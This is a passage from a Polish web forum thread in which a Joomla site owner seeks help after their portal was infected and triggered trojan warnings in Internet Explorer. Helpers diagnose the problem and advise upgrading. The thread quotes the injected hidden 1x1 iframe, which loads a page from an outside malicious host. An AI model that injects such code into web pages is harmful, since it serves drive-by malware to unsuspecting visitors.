Prośba o pomoc-portal w Joomla zaatakowany
Strona 1 z 2 12 OstatniOstatni
Wyniki 1 do 10 z 18

Temat: Prośba o pomoc-portal w Joomla zaatakowany

  1. #1
    Debiutant
    Dołączył
    14-04-2006
    Wpisy
    9
    Punkty
    10

    Domyślny Prośba o pomoc-portal w Joomla zaatakowany

    Witam,

    mam do Was wielką prośbę. Otóż wczoraj ktoś podpiął nam pod strone "konia trojańskiego" w taki sposób, że jeżeli ktoś wchodzi na strone przez Explorera to wyskakuje mu okienko monitu skryptu i informacja o tym że wykryto konia trojańskiego.Pod Firefoxem wszystko chodzi ok ponieważ jakoś sobie radzi z tym. Podobno ktoś mógł dostać się przez jakąś dziurę w Joomli lub forum. Jeżeli ktoś wie o co chodzi lub mógłby mi jakoś pomóc będę bardzo wdzięczny. Pozdrawiam Adres strony zainfekowanej to www.miastostudentow.pl Mozecie sprawdzić pod Explorerem i Firefoxem

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Wyjadacz josh awatar
    Dołączył
    20-09-2005
    Skąd
    B-stock :)
    Wpisy
    513
    Punkty
    86

    Domyślny

    a na kotrej to wersji joomla/ mambo dziala twoj serwis??


    widze pod IE Exploit.WMF trojan

    pozdr
    pozdrawiam
    Piotr Laskowski
    JoomlaPL.com | MamboPL.com
    Joomla.PL | Joomla!, LaTeX, R project, SPSS user...

  4. #3
    Debiutant
    Dołączył
    14-04-2006
    Wpisy
    9
    Punkty
    10

    Domyślny wersja joomla

    dokladnie coś takiego:
    Joomla! 1.0.7 Stable [ Sunburst ] 15-Jan-2006 20:00 UTC

  5. #4
    Debiutant
    Dołączył
    14-04-2006
    Wpisy
    9
    Punkty
    10

    Domyślny

    i jeszcze jedno...moze to bedzie smieszne teraz co napisze, ale jeżeli wejdziesz na strone przez Firefoxa i klkniesz powiedzmy w ikonke działu "Gdzie zjeść" i później pokaże Ci się menu po lewej stronie "Rozrywka" to zaraz pod tym nagłówkiem bedziesz miał taki mały kwadracik (u mnie jest czarny) i jak dasz na niego źródło to bedzie to wygladalo tak iframe src="http://zchxsikpgz.biz/dl/adv521.php" height="1" width="1"></iframe
    i to jest właśnie chyba ten syf.
    Pozdrawiam i dzieki za tak szybka odpowiedz

  6. #5
    Wiarus Dylek awatar
    Dołączył
    20-09-2005
    Skąd
    Białystok
    Wpisy
    2 864
    Punkty
    70

    Domyślny

    To nie jest smieszne, co napisales, bo definiuje to rozmiar 1x1 px
    Jeden z odwiedzajacych nasz serwis znalazl zlosliwy kod w pliku mod_mainmenu.php

  7. #6
    Debiutant
    Dołączył
    14-04-2006
    Wpisy
    9
    Punkty
    10

    Domyślny

    a mógłbym prosić o dokładniejszą podpowiedź jak to usunąć i co to za kod. dzwoniłem do home.pl bo tam znajduje się nasz serwis i oni nie wiedzą jak pomóż, ale powiedzieli mi że to najprawdopodobniej przez forum phpbb2 bylo wejście.

  8. #7
    Wiarus Dylek awatar
    Dołączył
    20-09-2005
    Skąd
    Białystok
    Wpisy
    2 864
    Punkty
    70

    Domyślny

    Kod podales wczesniej, w przypadku znalezionym przez Artura zostal on zmieniony na ciag znakow ASCII i dodany na poczatku pliku mod_mainmenu.php

  9. #8
    Debiutant
    Dołączył
    14-04-2006
    Wpisy
    9
    Punkty
    10

    Domyślny

    dzieki piekne za pomoc, wszytsko już powróciło do normalności, bede musial zainstalowac jakieś łaty i chyba usunac forum phpbb2 a pozniej zainstalowac jakies forum z dodatkow joomli.jeszcze raz dziekuje

  10. #9
    Nowicjusz
    Dołączył
    13-06-2006
    Wpisy
    27
    Punkty
    10

    Domyślny 1.09 PL

    czy dotyczy to również wersji 1.09 PL?

  11. #10
    Wyjadacz josh awatar
    Dołączył
    20-09-2005
    Skąd
    B-stock :)
    Wpisy
    513
    Punkty
    86

    Domyślny

    @pomian1 czy dotyczy czy tez nie to jednak bardzo mocno radzilbym pociagnac apgrejdem do 1.0.10

    pozdr
    pozdrawiam
    Piotr Laskowski
    JoomlaPL.com | MamboPL.com
    Joomla.PL | Joomla!, LaTeX, R project, SPSS user...

Strona 1 z 2 12 OstatniOstatni

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •